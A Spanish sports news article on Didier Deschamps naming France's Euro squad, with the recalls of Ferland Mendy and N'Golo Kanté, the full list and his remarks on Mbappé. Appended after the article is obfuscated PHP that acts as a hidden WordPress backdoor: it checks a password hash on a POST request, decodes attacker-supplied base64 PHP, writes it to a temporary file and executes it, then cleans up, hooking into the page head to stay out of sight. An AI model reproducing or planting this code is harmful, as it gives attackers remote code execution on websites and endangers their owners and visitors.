Pleno del Madrid con Francia: ¡vuelve Mendy!

Didier Deschamps anunció la lista de convocados para la próxima Eurocopa con las presencias de Ferland Mendy, Camavinga y Tchouaméni.

Didier Deschamps dio a conocer este jueves, en el telediario de TF1, la lista de convocados de la selección francesa para la disputa de la próxima Eurocopa, en la que Les Bleus parten como máximos favoritos para hacerse con el título. Ferland Mendy, que llevaba dos años sin ir convocado, fue la principal novedad de la misma, además de Bradley Barcola, extremo del PSG, que conoció su primera convocatoria tras haber realizado una temporada extraordinaria en París. Ngolo Kanté, de forma sorprendente, también fue llamado por Deschamps, después de varios meses en los que no contó con la confianza del seleccionador debido a su fichaje por el fútbol saudí.

También figuran en la convocatoria Aurélien Tchouaméni, duda para la final de la Champions League, y Eduardo Camavinga, fijo para el seleccionador francés, Deschamps, desde prácticamente el Mundial de Qatar. Ambos, concentrados con el Real Madrid para la final de Champions, deberán incorporarse a la concentración francesa el 2 de junio, un día después de medirse al Dortmund.

La lista, de una calidad extraordinaria, sigue liderada por Kylian Mbappé y Antoine Griezmann. El delantero disputará su último torneo antes de firmar con el Real Madrid, después de dejar el PSG tras siete temporadas en la capital francesa. Ambos buscan el único título que les falta de selecciones, ya que en su palmares se encuentran el Mundial de 2018 y la Nations League de 2021.

La lista al completo:

Porteros: Areola, Maignan, Samba.

Defensas: Clauss, Théo Hernández, Ibrahima Konaté, Jules Koundé, Mendy, Pavard, Saliba, Upamecano.

Centrocampistas: Kanté, Camavinga, Tchouaméni, Griezmann, Zaïre-Emery, Fofana, Rabiot.

Delanteros: Barcola, Coman, Dembélé, Giroud, Kolo Muani, Mbappé, Marcus Thuram.

Deschamps espera que el anuncio del fichaje de Mbappé “le libere”

Minutos después de dar a conocer la lista de convocados para la próxima Eurocopa, Didier Deschamps atendió a los medios de comunicación en la sede de TF1, en la que reconoció que el anuncio del Real Madrid para fichar a Mbappé podría “liberar” al capitán de la selección francesa. En la comparecencia pública, además, el bayonés justificó las decisiones de convocar a Barcola y Ngolo Kanté.

Mbappé y el anuncio de su fichaje: “De momento no he recibido ninguna petición (para que haga oficial su futuro club). No depende de mí. Llegará a un acuerdo con su nuevo club. Eso le mantendrá ocupado en ese tema. No soy nada aprensivo”

Ferland Mendy: Si hubiera estado Lucas Hernández, también habría estado Ferland Mendy. Considero que Lucas es un defensa central, así que Ferland habría estado ahí.. Tuvo bastantes lesiones la temporada pasada y esta. Su juego, que era principalmente ofensivo, ha evolucionado. Con Bellingham, Vinicius y Rodrygo por delante, se proyecta y divide mucho menos el centro del campo, pero ha ganado en calidad defensiva, que no era su punto fuerte”.

La vuelta de Ngolo Kanté: “Su última convocatoria fue en junio de 2022. Lo que vino después fue mucho más complicado para él, con una lesión que le impidió jugar el Mundial. Pudo recuperar toda su capacidad futbolística y atlética. De hecho, actualmente está jugando. La situación estaba clara en mi mente. Quería que recuperara su capacidad sobre el terreno de juego dando minutos de juego a jugadores jóvenes para que adquirieran experiencia. Tomé esta decisión porque creo que la selección francesa será más fuerte con él”.

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}